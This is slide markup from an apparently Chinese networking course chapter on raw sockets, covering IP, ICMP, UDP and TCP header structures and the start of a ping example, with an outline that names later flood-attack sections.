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422" y="-29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687AAB7D-8DAB-47F6-AB5B-D59F5E0CA4AA}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2014/8/13</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B1B51493-DF4E-4415-BADD-C6F11CA5B9F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87AAB7D-8DAB-47F6-AB5B-D59F5E0CA4AA}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2014/8/13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B1B51493-DF4E-4415-BADD-C6F11CA5B9F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87AAB7D-8DAB-47F6-AB5B-D59F5E0CA4AA}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2014/8/13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B1B51493-DF4E-4415-BADD-C6F11CA5B9F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7AAB7D-8DAB-47F6-AB5B-D59F5E0CA4AA}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2014/8/13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B51493-DF4E-4415-BADD-C6F11CA5B9F9}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27519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87AAB7D-8DAB-47F6-AB5B-D59F5E0CA4AA}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2014/8/13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B1B51493-DF4E-4415-BADD-C6F11CA5B9F9}"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687AAB7D-8DAB-47F6-AB5B-D59F5E0CA4AA}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2014/8/13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B1B51493-DF4E-4415-BADD-C6F11CA5B9F9}"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687AAB7D-8DAB-47F6-AB5B-D59F5E0CA4AA}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2014/8/13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B1B51493-DF4E-4415-BADD-C6F11CA5B9F9}"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687AAB7D-8DAB-47F6-AB5B-D59F5E0CA4AA}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2014/8/13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B1B51493-DF4E-4415-BADD-C6F11CA5B9F9}"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687AAB7D-8DAB-47F6-AB5B-D59F5E0CA4AA}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2014/8/13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B1B51493-DF4E-4415-BADD-C6F11CA5B9F9}"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687AAB7D-8DAB-47F6-AB5B-D59F5E0CA4AA}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2014/8/13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B1B51493-DF4E-4415-BADD-C6F11CA5B9F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687AAB7D-8DAB-47F6-AB5B-D59F5E0CA4AA}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2014/8/13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B1B51493-DF4E-4415-BADD-C6F11CA5B9F9}"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687AAB7D-8DAB-47F6-AB5B-D59F5E0CA4AA}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2014/8/13</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B1B51493-DF4E-4415-BADD-C6F11CA5B9F9}"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87AAB7D-8DAB-47F6-AB5B-D59F5E0CA4AA}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2014/8/13</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1B51493-DF4E-4415-BADD-C6F11CA5B9F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Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>章  原始套接字</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>13.1  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>概述</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>13.2  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>原始套接字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>创建</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>13.3  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>原始套接字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>报文</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>13.4  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>原始套接字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>接收</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>报文</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>13.5  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>原始套接字报文处理时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>结构</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>13.6  ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>例子</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>13.7  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>洪水攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>13.8  ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>洪水</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>13.9  UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>洪水</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>13.10  SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>洪水攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3982370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13.5.1  IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>头部的结构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="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1412776"/>
            <a:ext cx="4835525"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0484" y="4077072"/>
            <a:ext cx="4527550"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42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13.5.2  ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>头部结构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" kern="100" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="100" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的头部结构比较复杂，主要包含消息类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" kern="100" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>icmp_type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="100" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>，消息代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" kern="100" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>icmp_code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="100" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>、校验和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" kern="100" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>icmp_cksum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="100" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>等，不同的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" kern="100" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="100" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>类型其他部分有不同的实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="100" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" kern="100" baseline="0" smtClean="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>．</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>头部</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>结构</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>．不同类型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>请求</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="100" baseline="0" smtClean="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="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3212976"/>
            <a:ext cx="3283133"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105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ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>的头部结构</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常用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>报文包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ECHO-REQUEST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>（响应请求消息）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ECHO-REPLY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>（响应应答消息）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Destination Unreachable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>（目标不可到达消息）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Time Exceeded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>（超时消息）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Parameter Problems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>（参数错误消息）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Source Quenchs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>（源抑制消息）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Redirects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>（重定向消息）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Timestamps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>（时间戳消息）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Timestamp Replies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>（时间戳响应消息）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Address Masks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>（地址掩码请求消息）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Address Mask Replies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>（地址掩码响应消息）等，是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>上十分重要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的消息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="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7956" y="5373216"/>
            <a:ext cx="3143120" cy="12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7584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．不同类型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>请求</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子网掩码请求协议增加了标识符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>icmp_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>、序列号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>icmp_seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>和掩码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>icmp_mask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="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2475774"/>
            <a:ext cx="4587790"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4437112"/>
            <a:ext cx="4330146"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946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13.5.3  UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>头部结构</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UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的头部结构包含发送端的源端口号、数据接收端的目的端口号、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>数据的长度以及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的校验和等信息。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="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9937" y="2564904"/>
            <a:ext cx="4795046"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7864" y="4221088"/>
            <a:ext cx="4650661"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5282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13.5.4  TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>头部结构</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TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的头部结构主要包含发送端的源端口、接收端的目的端口、数据的序列号、上一个数据的确认号、滑动窗口大小、数据的校验和、紧急数据的偏移指针以及一些控制位等信息。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2" descr="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3429000"/>
            <a:ext cx="6017674" cy="296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100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13.6  ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>的例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>命令向目的主机发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ICMP ECHO_REQUEST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>请求并接收目的主机返回的响应报文，用来检验本地主机和远程的主机是否连接。</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 ping www.sina.com.cn</a:t>
            </a:r>
          </a:p>
          <a:p>
